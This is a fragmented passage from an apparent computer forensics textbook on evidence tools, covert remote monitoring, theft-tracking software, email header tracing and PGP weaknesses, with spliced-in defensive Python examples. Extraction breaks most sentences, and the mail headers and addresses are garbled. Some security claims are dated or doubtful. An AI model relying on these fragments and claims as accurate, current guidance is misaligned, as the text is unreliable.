It can be used to make one or more copies of all areas of a normal floppy diskette
...
This can be
helpful when you need to repeatedly make copies of diskettes for training classes
...
It can be used to automatically create and serialize software stored on floppy
diskettes
...
CopyQM Plus can be used to password protect the contents of an entire floppy
diskette
...
CopyQM Plus can be used to create virus-scanned floppy diskette tool kits configured for repeated tasks performed by computer forensics specialists, electronic
data personnel (EDP), auditors and computer security specialists
...
CopyQM Plus can be used to send a normal diskette over the Internet
...
No software dongle
...
It converts diskettes into self-contained programs that, when executed, recreate the original master diskette as many times as desired
...
Images may be optionally password protected through the use of built-in encryption
...
When this feature is selected, a log of the process is maintained for reference
...
CopyQM Plus is significantly faster than DOS DiskCopy and it automatically
copies the subject diskette, verifies the copy, and formats the target diskette
during the restoration process
...
44 MB)
...
2 MB, 1.68 MB, and 2
...
CopyQM Plus can be used to duplicate and restore any number of copies of a
given master diskette
...
It does not
copy all areas of copy protected diskettes (extra sectors added to one or more
tracks on a floppy diskette)
...
E-Commerce Investigations
A new Internet forensic tool has recently been introduced that aims to help educators, police, and other law enforcement officials trace the past World Wide Web activity of computer users
...
(NTI), can be used to identify past Internet browsing and
email activity done through specific computers
...
Kids can figure out ways to prevent their parents from finding anything on
their machine, but Net Threat Analyzer goes back in after the fact where things
are easier to detect
...
has made its Net Threat Analyzer available free of charge to computer crime specialists, school officials, and police
...
It flags possible threats, such as anything dealing with drugs, bombs, country codes, or pornography
...
For example, http://www
...
gov, is the official White House Web site,
and www
...
com is a pornography site
...
com
500 to 700 times, it will make it through most net nanny software, but it will raise
a red flag with the Net Threat Analyzer
...
New Technology Inc
...
forensicsintl
...
The tool is not available to the public, but a special version can be
purchased by Fortune 500 companies, government agencies, military agencies, and
consultants who have a legitimate need for the software
...
They can also be designed for delayed tasking
...
The participant should also have hands-on experience with these
programs
...
has also developed specialized search techniques and tools
that can be used to find targeted strings of text in files, file slack, unallocated file
space, and Windows swap files
...
This search tool is approved for use in security reviews by some U.S. government
classified agencies
...
It is widely used by classified government agencies and corporations that support these agencies
...
This software is used to quickly search hard disk drives, zip disks, and floppy
diskettes for key words or specific patterns of text
...
TextSearch Plus has been specifically designed
to meet the requirements of the government for use in computer security exit
reviews from classified government facilities
...
It is also compatible with FAT12, FAT16, and FAT32 DOS-based systems
...
Tests indicate that this tool finds more text strings than any other
forensic search tool
...
tool suites
...
When security spills are identified, they can easily be eliminated with New
Technology Inc
...
PRIMARY USES
Used to find occurrences of words or strings of text in data stored in files, slack,
and unallocated file space
Used in exit reviews of computer storage media from classified facilities
Used to identify data leakage of classified information on nonclassified computer systems
Used in internal audits to identify violations of corporate policy
Used by Fortune 500 corporations, government contractors, and government
agencies in security reviews and security risk assessments
Used in corporate due diligence efforts regarding proposed mergers
Used to find occurrences of keywords strings of text in data found at a physical
sector level
Used to find evidence in corporate, civil, and criminal investigations that involve computer-related evidence
Used to find embedded text in formatted word processing documents (WordPerfectTM and fragments of such documents in ambient data storage areas)
PROGRAM FEATURES AND BENEFITS
DOS-based for ease of operation and speed
...
Software dongles get in the way and they restrict your
ability to process several computers at the same time
...
Compact program size, which easily fits on one floppy diskette with other
forensic software utilities
...
Has logical and physical search options that maintain compatibility with government security review requirements
...
User configuration is automatically saved for future use
...
Alert for graphic files (secrets can be hidden in them)
...
High speed operation
...
False hits don’t stop processing
...
Currently used by hundreds of law enforcement computer crime units
...
Currently used by several government military and intelligence agencies
...
The current version allows for up to 120 search strings to be searched for at one
time [5]
...
has also developed a methodology and tools that aid in the
identification of relevant evidence and unknown strings of text
...
However, many times not all is known about what may be stored on
a given computer system
...
The training participants should be able
to fully understand these methods and techniques
...
Each training participant should also leave the class
with a licensed copy of New Technology Inc
...
INTELLIGENT FORENSIC FILTER
This forensic filter utility is used to quickly make sense of nonsense in the
analysis of ambient data sources (Windows swap/page files, file slack, and data
associated with erased files)
...
S
...
It is used to quickly
identify patterns of English language grammar in ambient data files
...
The program can be used
as a sampling tool and it is particularly useful when used to evaluate Windows
swap/page files
...
’s Filter_I prior to March, 2003
...
PRIMARY USES
Used as an intelligence gathering tool for quick assessments of a Windows
swap/page file to identify past communications on a targeted computer
Used as a data sampling tool in law enforcement, military, and corporate investigations
Used to quickly identify patterns of English language grammar in ambient data
sources
Used to identify English language communications in erased file space
PROGRAM FEATURES AND BENEFITS
DOS-based for speed
...
Automatically processes any data object (a swap file, a file constructed from
combined file slack, a file constructed from combined unallocated space, or a
Windows swap/page file)
...
Can be operated in batch mode with other forensic tools and processes
...
Capable of quickly processing ambient data files that are up to 2 gigabytes in size
...
Quantity discounts and site licenses are available [6]
...
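The three ambient-data tasks this chapter keeps returning to, capturing file slack, searching slack and unallocated space for keywords at the physical sector level (the TextSearch Plus use case), and filtering carved text for English-language patterns (the Filter_I use case), as one added example. This is not NTI's code; it assumes 512-byte sectors, 4-sector clusters, a FAT-like layout in which each file fits in one cluster, and a hand-written directory table, and every byte of the image, including the "deleted" draft, the live memo and the erased mail fragment, is constructed sample data.

```python
"""Keyword search and English-likeness filter over slack and unallocated space (added example)."""
from __future__ import annotations

import random
import re

SECTOR = 512
CLUSTER = 4 * SECTOR                                         # 2048 bytes (assumption)
DIRECTORY = {"memo.txt": {"first_cluster": 2, "size": 690}}  # constructed directory table


def build_image() -> bytes:
    """Constructed 4-cluster image: boot filler, FAT filler, one live file, one free cluster."""
    img = bytearray(4 * CLUSTER)
    img[0:3] = b"\xeb\x3c\x90"                                   # cluster 0: boot-sector-like
    old = (b"Draft of merger terms for Alice. " * 64)[:CLUSTER]  # deleted file once in cluster 2
    img[2 * CLUSTER:3 * CLUSTER] = old
    memo = (b"Lunch menu for Friday: pizza.\n" * 23)[:690]      # live file overwrites 690 bytes
    img[2 * CLUSTER:2 * CLUSTER + len(memo)] = memo             # bytes 690..2047 are file slack
    rng = random.Random(1)                                      # cluster 3: unallocated noise
    img[3 * CLUSTER:4 * CLUSTER] = bytes(rng.getrandbits(8) for _ in range(CLUSTER))
    mail = b"From: bob@example.com\r\nSubject: merger timeline\r\nWe close next Tuesday.\r\n"
    img[3 * CLUSTER + 300:3 * CLUSTER + 300 + len(mail)] = mail  # erased mail fragment
    return bytes(img)


def region_of(offset: int) -> str:
    """Classify an absolute byte offset as allocated, slack, unallocated or system area."""
    cluster = offset // CLUSTER
    for name, ent in DIRECTORY.items():       # single-cluster files; a real FS walks the chain
        if cluster == ent["first_cluster"]:
            in_file = offset % CLUSTER < ent["size"]
            return f"allocated:{name}" if in_file else f"slack:{name}"
    return "system" if cluster < 2 else "unallocated"


def keyword_search(image: bytes, keywords: list[bytes]) -> list[dict]:
    """Physical-level search: every hit carries its sector and region, independent of any file."""
    hits = []
    for kw in keywords:
        for m in re.finditer(re.escape(kw), image, re.IGNORECASE):
            off = m.start()
            hits.append({"keyword": kw.decode(), "offset": off, "sector": off // SECTOR,
                         "region": region_of(off),
                         "context": image[max(0, off - 12):off + len(kw) + 12]})
    return hits


PRINTABLE = re.compile(rb"[\x20-\x7e]{6,}")
COMMON = {"the", "a", "of", "for", "and", "to", "in", "we", "is", "on", "from", "next"}
WORD = re.compile(r"^[A-Za-z']+$")


def carve_strings(image: bytes) -> list[tuple[int, str]]:
    """Printable-ASCII runs with their offsets, like a strings(1) pass over raw sectors."""
    return [(m.start(), m.group().decode("ascii")) for m in PRINTABLE.finditer(image)]


def english_score(text: str) -> float:
    """Fraction of tokens that look like English words; runs under three tokens score 0."""
    toks = [t.strip(".,:;!?\"'()") for t in text.split()]
    toks = [t for t in toks if t]
    if len(toks) < 3:
        return 0.0
    good = sum(1 for t in toks if WORD.match(t) and re.search(r"[aeiouyAEIOUY]", t)
               and (t.lower() in COMMON or len(t) >= 3))
    return good / len(toks)


def filter_english(image: bytes, threshold: float = 0.6) -> list[dict]:
    """Keep carved runs that read like prose; drop binary noise that happens to be printable."""
    return [{"offset": off, "region": region_of(off), "score": round(english_score(s), 2),
             "text": s[:60]}
            for off, s in carve_strings(image) if english_score(s) >= threshold]


IMAGE = build_image()

if __name__ == "__main__":
    for hit in keyword_search(IMAGE, [b"merger"]):
        print(hit["sector"], hit["region"], hit["context"])
    for row in filter_english(IMAGE):
        print(row["offset"], row["region"], row["score"], row["text"])
```

The live memo never mentions a merger, so a logical, file-by-file search returns nothing; the physical search finds the word in the slack of memo.txt (left over from the overwritten draft) and again in the unallocated cluster (the erased mail), and the English filter drops the random printable runs that the noise cluster throws off, which is the "make sense of nonsense" role described for the forensic filter.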
They should
also demonstrate their knowledge of how to modify the structure and hide data in
obscure places on floppy diskettes and hard disk drives
...
Furthermore, demonstrations of password-recovery software should be given regarding encrypted WordPerfect, Excel, Lotus, Microsoft Word, and PKZIP files
...
Matching a Diskette to a Computer
New Technology Inc
...
Unlike some special government agencies, New Technology Inc
...
Each participant is taught how to use special software tools to complete this process
...
Furthermore, the participant
should learn how password-protected compressed files can be broken; this should
be covered in hands-on workshops during the training course
...
These techniques should also be demonstrated by the participant, and cluster
chaining will become familiar to the participant
...
This process will focus on computer forensics issues tied to data that the computer user probably doesn’t realize
exists (file slack, unallocated file space, and Windows swap files)
...
Such a technique could be used to covertly capture
keyboard activity from corporate executives, for example
...
TYPES OF BUSINESS COMPUTER FORENSIC TECHNOLOGY
Finally, let’s briefly look at the following types of business computer forensics
technology:
Remote monitoring of target computers
Creating trackable electronic documents
Theft recovery software for laptops and PCs
Basic forensic tools and techniques
Forensic services available
Remote Monitoring of Target Computers
Data Interception by Remote Transmission (DIRT) from Codex Data Systems
(CDS), Inc
...
No physical access is necessary
...
Creating Trackable Electronic Documents
There are so many powerful intrusion detection tools that allow the user to create
trackable electronic documents that it is beyond the scope of this chapter to
mention them all
...
In general, most of these tools identify (including their location) unauthorized
intruders who access, download, and view these tagged documents
...
Theft Recovery Software for Laptops and PCs
If your PC or laptop is stolen, is it smart enough to tell you where it is? According
to a recent FBI report, 98% of stolen computers are never recovered
...
8 billion dollars [9]
...
Nationwide losses to computer component theft cost corporate America over
$11 billion a year
...
What Is the Real Cost of a Stolen Laptop or PC?
When you lose your wallet, the last thing you think of is how much it is going to
cost to replace your wallet
...
Our mothers always told us, an ounce of prevention is worth a pound of cure
...
Think about what it really costs to replace a stolen computer
...
The price of replacing the software
...
If possible at all, do you keep perfect back-ups?
The cost of lost production time or instruction time
...
The cost of reporting and investigating the theft, filing police reports and insurance claims
...
The cost of processing and ordering replacements, cutting a check, and the like
...
So, doesn’t it make sense to use an ounce of prevention? You don’t have to be
a victim
...
com has a solution: PC PhoneHomeTM [9] is a
software application that will track and locate a lost or stolen PC or laptop anywhere in the world
...
It is also completely transparent to the user
...
In other words, PC PhoneHome is a transparent
theft protection and recovery software system that you install on your laptop or PC
...
Let’s look at the following scenario [9]
...
On your first business trip with your new computer you leave it (you
think) safely hidden in your hotel room while you entertain a client
...
The financial loss is bad enough, but the hours of work
you’ve lost is worse, and the sensitivity of the information in your laptop, if it gets
into the hands of the wrong people, could be a disaster [9]
...
Is this really possible or is it just another fanciful hi-tech gimmick from the imagination of
the writers of the latest James Bond movie? It’s no gimmick
...
PC PhoneHome is a software application that, when installed in your laptop or
desktop computer, secretly transmits an electronic message to an email address of
your choice
...
How Does PC PhoneHome Work?
It’s simple
...
PC PhoneHome
sends a stealth email to your designated email address once a day, or every time you
connect to the Internet and are assigned an IP address different from your previous
IP address
...
When your stolen computer accesses the Internet
by any method, your lost or stolen computer will send you its stealth email message,
informing you of its location [9]
...
As a side benefit, any other items
of your property (like expensive jewelry) that might have been taken at the same
time may also be recovered [9]
...
The product is a natural fit
for the security monitoring and Internet service provider (ISP) industry
...
Basic Forensic Tools and Techniques
Today, many computer forensics workshops have been created to familiarize investigators and security personnel with the basic techniques and tools necessary for
a successful investigation of Internet and computer-related crimes
...
However, throughout the book, a number of them will be mentioned in detail
...
Forensic Services Available
Through computer forensic evidence acquisition services, forensic experts for companies like Capitol Digital Document Solutions [10] can provide management with
a potent arsenal of digital tools at its disposal
...
This image is an exact duplication of the source
media and allows evaluation within their laboratories with minimal disruption to
others
...
Don’t open any files attached to an email if the subject line is questionable or
unexpected
...
Disable the Windows Scripting Host
...
Although this can make your computer easier to use (being able to program shortcuts, or use third-party Visual Basic scripts), it is also a security risk
...
To remove Windows Scripting Host from your
computer, open up your Control Panel and select the Add/Remove Programs
icon
...
Always download files from well-known established and trusted sites
...
Install an anti-virus program
...
The program will warn you if any virus is detected
...
Improperly configured anti-virus software can be as good as no software
...
Back up your files on a regular basis
...
You should store your backup copy in a separate location from your work files, one that is preferably not on your computer
...
Configure your anti-virus software to boot automatically on start-up and run at all times
...
Educate yourself about the latest viruses
...
Write-protect all system and software diskettes using the write-protect tab to
prevent any virus from spreading
...
Don’t boot from a floppy disk
...
If you use a floppy while working on your computer, remove it when
you shut the machine off or the computer will automatically try to boot from
the floppy, perhaps launching any viruses on the disk
...
Even a well-meaning friend may unknowingly pass along
a virus, trojan horse, or worm
...
This is always important, but especially if you
are using the disk to carry information between one computer and another
...
Running a virus scan before launching any of the programs on the
disk will prevent infection
...
This will ensure that the virus will not spread
...
You can find this option under the View menu
...
Consider using a different email program
...
Add your own address to your Outlook address book, so if it starts
sending out messages on its own, at least you’ll know about it
...
SPECIALIZED FORENSICS TECHNIQUES
Threats to the strategic value of your business almost always involve a computer or
network because that is where your company’s proprietary information and business processes are located
...
A malicious change to an individual’s personnel records
could cost the person a job and a career
...
Corporate espionage can steal trade secrets
...
Employees of a company might be stealing from it or using company resources to
work for themselves, or they can be using excessive work time to surf pornographic
sites and play games [11]
...
Gathering
legal evidence is difficult and requires trained specialists who know computers, the
rules of evidence gathering, and how to work with law enforcement authorities [11]
...
Any organization that does not have a way to detect and stop malicious behavior can be victimized with no legal recourse
...
When an intruder attacks or steals from an organization, the ability or threat to get law enforcement involved may be the only way to reduce the damage or prevent future occurrences
...
Companies employ computer forensics when there is serious risk of information being compromised, a potential loss of competitive capability, a threat of lawsuits, or potential damage to reputation and brand
...
In theory, employees are less
tempted to stray when they know they are being watched [11]
...
Companies have used legal evidence gathering
to drive home points with employees and external intruders even though the cost
of investigations exceeded recovery
...
Computer forensics also may not be needed when computers and networks play a minor
role in an incident or threat, but this may not always be clear
...
Legal Evidence
A computer forensics examiner always should gather and preserve evidence according
to Federal Rules of Evidence
...
Finding and isolating evidence to prove or disprove allegations
is as difficult as preserving it
...
Computer forensics has
been described as looking for one needle in a mountain of needles
...
The 1s and 0s that make up
data can be hidden and vanish instantly with a push of a button
...
Preparing evidence requires patience and thorough documentation so it can
withstand judicial scrutiny
...
Preserving computer evidence requires pre-incident planning and training of
employees in incident discovery procedures
...
Managers should make sure that there’s minimal disturbance of the computer, peripherals, and area surrounding the machine
...
Moreover, never run programs on a computer
in question
...
Finally, never let a suspect help open or turn on a machine [11]
...
Unfortunately,
there are no certified procedures for safe evidence gathering, nor is there a single approach for every type of case
...
Examiners will, for example, photograph equipment in place before removing
it and label wires and sockets so computers and peripherals can be reassembled exactly in a laboratory
...
They never touch original computer hard disks and
floppies
...
When suspects attempt to destroy
media, such as cutting up a floppy disk, investigators reassemble the pieces to read
the data from it
...
The internal clock might be wrong, a suspect might have tampered with logs, or the
mere act of turning on the computer might change a log irrevocably [11]
...
They then
calibrate or recalibrate evidence based on a time standard or work around log tampering, if possible [11]
...
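The clock calibration step described above, as an added example that is not from the page: the examiner records the suspect machine's displayed clock next to a trusted reference at seizure, derives the offset, converts every log stamp to true UTC, flags stamps the machine could only have written after seizure, and correlates the corrected events with an external record that already carries trustworthy time. The time zone (treated as a fixed UTC offset, so DST changes are out of scope), the log lines and the firewall record are all constructed assumptions.

```python
"""Recalibrating suspect-machine timestamps against a trusted time standard (added example)."""
from __future__ import annotations

from datetime import datetime, timedelta, timezone

SUSPECT_TZ = timezone(timedelta(hours=-4))  # assumption: machine configured for UTC-4

# Recorded at seizure (constructed): trusted reference vs. what the suspect's clock showed.
REFERENCE_UTC = datetime(2003, 5, 14, 13, 0, 0, tzinfo=timezone.utc)
OBSERVED_LOCAL = datetime(2003, 5, 14, 9, 47, 12)   # naive, in the suspect's own zone

# Constructed suspect-side log lines, "<local stamp> <event>".
SUSPECT_LOG = [
    "2003-05-14 08:30:00 logon jdoe",
    "2003-05-14 08:31:05 usb mass storage attached",
    "2003-05-14 10:05:00 file deleted c:\\docs\\terms.xls",
]
# Constructed external record already in true UTC (a firewall), serving as the time standard.
FIREWALL_UTC = [
    (datetime(2003, 5, 14, 11, 43, 55, tzinfo=timezone.utc), "outbound 10.0.0.7 -> 203.0.113.9:443"),
]


def clock_offset(reference_utc: datetime, observed_local: datetime, tz: timezone) -> timedelta:
    """Positive when the suspect clock ran fast, negative when it ran slow."""
    return observed_local.replace(tzinfo=tz).astimezone(timezone.utc) - reference_utc


def parse_line(line: str) -> tuple[datetime, str]:
    """Split '<YYYY-MM-DD HH:MM:SS> <event>' into a naive local datetime and the event text."""
    stamp, event = line[:19], line[20:]
    return datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S"), event


def normalize_log(lines, offset: timedelta, tz: timezone, observed_local: datetime) -> list[dict]:
    """Convert each stamp to true UTC and flag stamps later than the clock reading taken at
    seizure: the machine could only have written those after it was seized or with a changed clock."""
    out = []
    for line in lines:
        local, event = parse_line(line)
        true_utc = local.replace(tzinfo=tz).astimezone(timezone.utc) - offset
        out.append({"raw_local": local, "true_utc": true_utc, "event": event,
                    "after_seizure": local > observed_local})
    return out


def correlate(normalized: list[dict], external,
              tolerance: timedelta = timedelta(seconds=5)) -> list[tuple]:
    """Pair corrected suspect events with external events that fall within the tolerance."""
    pairs = []
    for ev in normalized:
        for ts, desc in external:
            delta = (ev["true_utc"] - ts).total_seconds()
            if abs(delta) <= tolerance.total_seconds():
                pairs.append((ev["event"], desc, delta))
    return pairs


if __name__ == "__main__":
    offset = clock_offset(REFERENCE_UTC, OBSERVED_LOCAL, SUSPECT_TZ)
    print("suspect clock offset:", offset)
    events = normalize_log(SUSPECT_LOG, offset, SUSPECT_TZ, OBSERVED_LOCAL)
    for ev in events:
        print(ev["true_utc"].isoformat(), ev["event"], "AFTER SEIZURE" if ev["after_seizure"] else "")
    print(correlate(events, FIREWALL_UTC))
```

With the suspect clock 47 minutes and 12 seconds fast, the raw "08:31:05" entry would never line up with the firewall's 11:43:55 UTC connection; after correction it lands two seconds away, and the "10:05:00" deletion is flagged because it post-dates the clock reading taken at seizure, which is exactly the kind of inconsistency the examiner has to explain or work around before relying on the log.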
It is a rule in computer forensics that
only the physical level of magnetic materials where the 1s and 0s of data are
recorded is real, and everything else is untrustworthy
...
Examiners search at the bit level of 1s and 0s across a wide range of areas inside
a computer, including email, temporary files in the Windows operating system and
in databases, swap fields that hold data temporarily, logical file structures, slack and
free space on the hard drive, software settings, script files that perform preset activities, Web browser data caches, bookmarks, and history and session logs that record
patterns of usage
...
Investigators have many tricks that help them get around the clever suspect
...
Rather, they look
for evidence in a computer that tells them what is in the encrypted file
...
For
data concealed within other files or buried inside the 1s and 0s of a picture, an investigator can tell the data is there even though it is inaccessible
...
When forensic examiners find computer evidence, they must present it in a
logical, compelling, and persuasive manner that a jury will understand and a defense counsel cannot rebut
...
Case presentation requires experience, which only can be gained through
courtroom appearances
...
An experienced examiner knows the questions that opposing attorneys
will ask and the ways to provide answers that withstand challenge
...
Not long ago, attorneys knew little about computers and how they operated, but today they do and
they are increasingly skilled at challenging examiners’ methods [11]
...
It is a fast-growing field because
computers and networks have moved to the heart of business and societal operations
...
Because investigations are so specialized, few organizations have the
human or technical resources to gather and compile evidence that withstands court
challenges
...
It’s important that managers and lawyers remember that computer evidence is fragile and that the best way to handle an incident is
to isolate it until examiners take over [11]
...
Computers that work miracles
in your day-to-day operations often malfunction—and you lose valuable data
...
Hackers, both inside and outside your company, can access your information, manipulate it, hide it, steal it, and cause huge losses of data [14]
...
When files or documents are
deleted from a computer, the majority of the actual information is typically left behind
...
Documents and files deleted or hidden even years ago may be recovered
through a computer investigation
...
What can you do about it right away? You should turn to computer forensic technicians or specialists (like Kessler International) for hard drive data recovery and other
data recovery services [14]
...
These teams of data recovery experts know how to retrieve your lost data from damaged and corrupt storage
media including hard drives, back-up systems, temporary storage units, and more
...
SPYWARE AND ADWARE
Spyware is Internet jargon for advertising supported software (adware)
...
There are several large media companies that approach shareware authors to
place banner ads in their products in exchange for a portion of the revenue from
banner sales
...
If you find the banners annoying, there is usually an option to
remove them by paying the regular licensing fee
...
While according to the privacy policies of the companies, there will be no
sensitive or identifying data collected from your system and you shall remain
anonymous, the fact still remains that you have a live server sitting on your PC that
is sending information about you and your surfing habits to a remote location
...
There are also products that display advertising but do not
install any tracking mechanism on your system
...
However, there are certain issues that a privacy-oriented user may object
to and therefore prefer not to use the product
...
What’s the Hype About?
While legitimate adware companies will disclose the nature of data that is collected
and transmitted in their privacy statement (linked from their database), there is almost no way for the user to actually control what data is being sent
...
On the Other Hand
Millions of people use advertising supported spyware products and could not care
less about the privacy hype
...
Real Spyware
There are also many PC surveillance tools that allow a user to monitor all kinds of
activity on a computer, ranging from keystroke capture, snapshots, email logging,
chat logging, and just about everything else
...
Furthermore, these tools are perfectly legal in most places, but, just like an ordinary tape recorder, if they are
abused, they can seriously violate your privacy
...
Here, data recovery is only half the story, with the task of decryption providing a potentially greater obstacle to be overcome
...
Some of the most commonly used applications provide encryption protected
by passwords that can be readily defeated by investigators with the right tools and
the time to use them
...
Nevertheless, in
these cases it may still be possible to decrypt data by widening the scope of the investigation to include intelligence sources beyond the computer under investigation
...
To decrypt data encrypted in this fashion, a private key and
passphrase is needed
...
Similarly, the passphrase may be recorded somewhere on the computer in case it is forgotten or may be written down somewhere
and kept in a nearby location
...
One affects email
...
First, a
weakness has been discovered in the world’s most popular encryption program
that, in some circumstances, allows the encryption program to be completely bypassed
...
Second, hackers have recently
discovered a cloaking program that allows them to blow past firewalls on servers
and networks without being detected
...
These three revelations taken together are seriously bad news for Internet
privacy, confidentiality, and security
...
If a snoop can gain physical access to your computer or floppy disk where you store your secret key, he can modify it and wait for you
to use it
...
From that point on, he has access to the rest of your encrypted personal information and you never know it
...
In this instance, the protection offered by encryption is illusory
...
Internet and Email Encryption and Security
For several years lawyers have been advised to use encryption programs to scramble
sensitive email messages before sending them
...
PGP is a dual key, algorithm-based code system that makes encrypted data practically
impossible to decipher
...
Of the 800
million people using the Internet, about 60 million use PGP to encrypt email
...
His second goal
was to work toward making PGP an international standard
...
The flaw is serious for two reasons
...
Until recently many systems that make e-commerce
available by credit card on the Internet have been based on PGP
...
Second, the theory behind PGP is essentially the same as that
used in the Rivest, Shamir and Adleman (RSA) standard for digital signatures
...
Next, let’s briefly look at how to protect data from being compromised
...
PROTECTING DATA FROM BEING COMPROMISED
In the past 25 years, since the introduction of the personal computer, a great change
has taken place in the way people use computers
...
They are used to assist with most tasks in the workplace
...
You
maintain financial records, schedule appointments, and store significant amounts
of business records, all electronically
...
Almost any type of investigation and litigation today may rely on protecting evidence obtained from computer systems
...
This evidence may be used to establish that a crime has been committed or
assert other points of fact in a court of law, such as identify suspects, defend the innocent, prosecute the guilty, and understand individuals’ motives and intents
...
In other words, computer forensics is used by experts to protect data from being
compromised
...
It is not sufficient to merely have the technical skills to locate evidence on computer media
...
These
experts’ knowledge of what to look for and where to look is also important
...
How can you find out who is sending you email from a certain AOL
or Hotmail account? Well, that’s not what this next section is about
...
INTERNET TRACING METHODS
If an email comes from a real, valid email account and you want to know who the
person behind that email account is, then you most likely will need to serve the Internet provider who is hosting that email account a court order
...
Who
knows, he might have posted somewhere with his real name and address [13]
...
This can be done quite easily by simply changing the Sender and Return-to fields to
something different
...
Every email has a so-called header
...
Since the header is rather ugly, it is normally
hidden by the email program
...
The email text lines below are a typical, but not particularly sophisticated, example of faked email
...
You should, however, be aware that there are much more sophisticated ways
to fake email
...
security (see Figure 2
...
com/mrm/security/trace-forgery
...
But for now, back to the easy
cases, as shown by the following email lines [13]:
Received: from SpoolDir by IFKW-2 (Mercury 1
...
com>
Received: from bang
...
su
...
ifkw
...
de (Mercury
1
...
237
...
60] (Lilla_Red_10 [130
...
155
...
jmk
...
se (8
...
6/8
...
6) with ESMTP id PAA17265 for
de>; Wed, 13 May 1998 15:49:09 +0200 (MET DST)
X-Sender: o-pabjen@130
...
155
...
237
...
60]>
Mime-Version: 1
...
2 A message sent to the newsgroup alt
...
Content-Type: text/plain; charset="us-ascii"
Date: Wed, 13 May 1998 15:49:06 +0200
To: luege-ti@ifkw
...
de
From: Kuno Seltsam
uni-muenchen
...
com>
Subject: Important Information
The preceding lines should look quite familiar
...
The following line is a number
that your email program (in this case Pegasus Mail) might add to the mail to keep
track of it on your hard disk [13]:
X-PMFLAGS: 34078848 0
The following lines state that the message contains normal, plain text without
any fancy letters like umlauts, etc
...
0 Content-Type: text/plain;
charset="us-ascii"
The following line contains a tracking number, which the originating host has
assigned to the message
...
If you for some reason doubt that
the message really came from someone at seltsam
...
For this task, you can,
for example, use TJPing (http://www
...
com/), a small program that
tracks IP packages online and resolves IP numbers [13]:
Message-Id:
155
...
237
...
60 - May 14, 1998
22:01:25
Official Name: L-Red-10
...
su
...
237
...
60
This is the originating computer from which the message was sent, not the
mailserver
...
The situation is
very different within companies, though, since employees tend to have their own
computers, which no one else uses
...
It is comparatively easy to find out which company you are dealing with
...
), add www and type
it into your browser
...
jmk
...
se is the journalism department
of the University of Stockholm [13]
...
This tells you who was logged on to the mailserver when the message was sent
...
Eudora (http://www
...
com/) does, whereas Pegasus Mail doesn’t [13]
...
237
...
254
So now you know that the user who sent us the mail is o-pabjen
...
topjimmysoftware
...
jmk
...
se)
...
237
...
254 or
o-pabjen@bang
...
su
...
Maybe you want to know his or her real name
...
Finger is a command that reveals basic information about the account holder
...
It is always worth a try, though
...
etoracing
...
htm), you’ll learn the following [13]:
Login name: o-pabjen In real life: Pabst Jens global
So, now you have a name: Jens Pabst
...
If you manage to obtain the information that’s been accumulated so far, then
you don’t actually have to look any further
...
“Kuno Seltsam
jmk
...
se>
...
237
...
60] (Lilla_Red_10 [130
...
155
...
jmk
...
se (8
...
6/8
...
6) with ESMTP id PAA17265 for
de>; Wed, 13 May 1998 15:49:09 +0200 (MET DST)
The preceding lines state which computer the mailserver has received the message from, when, and that the message is supposed to be sent to luege-ti@ifkw
...
de
...
ifkw
...
de) has received the message
...
Received: from bang
...
su
...
ifkw
...
de (Mercury
1
...
com>
and an internal message from the mailserver about where and how it distributed the
message within its system
...
somewhere
...
Received: from SpoolDir by IFKW-2 (Mercury 1
...
The procedures and tools
presented here are by no means all encompassing but are intended to elicit design of
custom tools by those more programmatically inclined
...
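The header walk-through above can be automated. The following is an added example, not code from the book: it walks the Received: chain of a constructed header (documentation-only hosts and addresses) from the earliest hop upward, reports the originating host and IP together with the X-Sender user, and flags the two forgery indicators the text relies on, a From: domain that does not match where the message entered the mail system and a Received: chain whose hops do not link up.

```python
"""Trace the Received: chain of an email back to its originating host.

Added example (not from the book). The sample header is constructed with
documentation-only names and addresses (example.* domains, 192.0.2.0/24).
"""
import email
import email.utils
import re

SAMPLE = """\
Received: from SpoolDir by MAIL-2 (Mercury 1.21); 13 May 98 15:49:37 +0100
Received: from relay.journalism.example.net (192.0.2.60)
 by mail.uni.example.de (Mercury 1.21); 13 May 98 15:49:34 +0100
Received: from [192.0.2.60] (Lilla_Red_10 [192.0.2.60])
 by relay.journalism.example.net (8.8.6/8.8.6) with ESMTP id PAA17265
 for <recipient@uni.example.de>; Wed, 13 May 1998 15:49:09 +0200 (MET DST)
X-Sender: o-pabjen@192.0.2.60
From: Kuno Seltsam <kuno@seltsam.example.com>
To: recipient@uni.example.de
Subject: Important Information

Please read the attached information.
"""

# One hop: "from <claimed host> (<name> [<ip>]) by <accepting server> ...; <date>"
HOP_RE = re.compile(
    r"from\s+(?P<from>\S+)"             # host as announced by the sending side
    r"(?:\s+\((?P<comment>[^)]*)\))?"   # (name [ip]) as recorded by the receiver
    r".*?\bby\s+(?P<by>\S+)",           # the server that accepted the message
    re.IGNORECASE | re.DOTALL,
)
IP_RE = re.compile(r"\[?(\d{1,3}(?:\.\d{1,3}){3})\]?")


def parse_received(value):
    """Split one Received: header into its from/by hosts, IP and timestamp."""
    value = " ".join(value.split())     # undo header folding
    m = HOP_RE.search(value)
    if not m:
        return None
    comment = m.group("comment") or ""
    name = comment.split("[")[0].strip()
    # Prefer the address the receiving server observed over the claimed name.
    ip = IP_RE.search(comment) or IP_RE.search(m.group("from"))
    return {
        "from": m.group("from").strip("[]").lower(),
        "name": None if not name or IP_RE.fullmatch(name) else name,
        "ip": ip.group(1) if ip else None,
        "by": m.group("by").lower(),
        "date": value.rsplit(";", 1)[1].strip() if ";" in value else "",
    }


def is_internal(hop):
    """A hop between unqualified names (spool directory, internal queue) stays inside one mail system."""
    return "." not in hop["from"] and "." not in hop["by"]


def trace(raw):
    """Return the hops earliest-first, the originating hop and forgery indicators."""
    msg = email.message_from_string(raw)
    hops = [h for h in map(parse_received, msg.get_all("Received", [])) if h]
    hops.reverse()                      # the bottom Received: line was added first
    flags = []
    # The server that accepted the message at one hop should be the 'from'
    # side of the next; a break means a line was forged or injected.
    for earlier, later in zip(hops, hops[1:]):
        if not is_internal(later) and later["from"] != earlier["by"]:
            flags.append("chain break: %s -> %s" % (earlier["by"], later["from"]))
    # From: is free text written by the sender; compare it with where the
    # message really entered the mail system.
    sender = email.utils.parseaddr(msg.get("From", ""))[1]
    domain = sender.rsplit("@", 1)[-1].lower()
    origin = hops[0] if hops else None
    if origin and domain and not any(
        h.endswith(domain) for h in (origin["from"], origin["by"])
    ):
        flags.append("From: domain %s does not match first hop %s" % (domain, origin["by"]))
    return {"origin": origin, "hops": hops, "x_sender": msg.get("X-Sender"), "flags": flags}


if __name__ == "__main__":
    result = trace(SAMPLE)
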